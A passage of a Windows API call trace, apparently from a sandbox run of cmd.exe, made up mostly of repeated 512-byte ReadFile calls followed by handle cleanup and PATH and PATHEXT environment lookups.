lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.942] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.942] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.942] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.942] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.943] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.943] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.943] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.943] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.943] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.943] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.943] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.943] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.943] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.944] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.944] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.944] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.944] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.944] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.944] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.944] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.944] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.944] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.944] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.945] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.945] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.945] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.945] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.945] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.945] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.945] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.945] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.945] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.946] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.946] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.946] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.946] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.946] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.946] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.946] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.946] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.946] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.947] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.947] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.947] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.947] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.947] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.947] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.947] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.947] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.947] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.947] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.948] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.948] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.948] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.948] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.948] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.948] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.948] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.948] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.948] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.949] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.949] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.949] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.949] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.949] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.949] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.949] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.949] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.949] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.949] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.950] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.950] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.950] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.950] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.950] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.950] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.950] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.950] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.950] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.950] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.951] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.951] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.951] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.951] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.951] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.951] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.951] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.951] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.951] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.952] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.952] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.952] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.952] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.952] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.952] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.952] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.952] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.952] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.982] FindClose (in: hFindFile=0x2c0830 | out: hFindFile=0x2c0830) returned 1 [0205.982] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0206.146] _close (_FileHandle=3) returned 0 [0206.147] GetConsoleTitleW (in: lpConsoleTitle=0x12f338, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0206.147] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0206.147] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0206.147] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0206.147] FindClose (in: hFindFile=0x2c0830 | out: hFindFile=0x2c0830) returned 1 [0206.147] 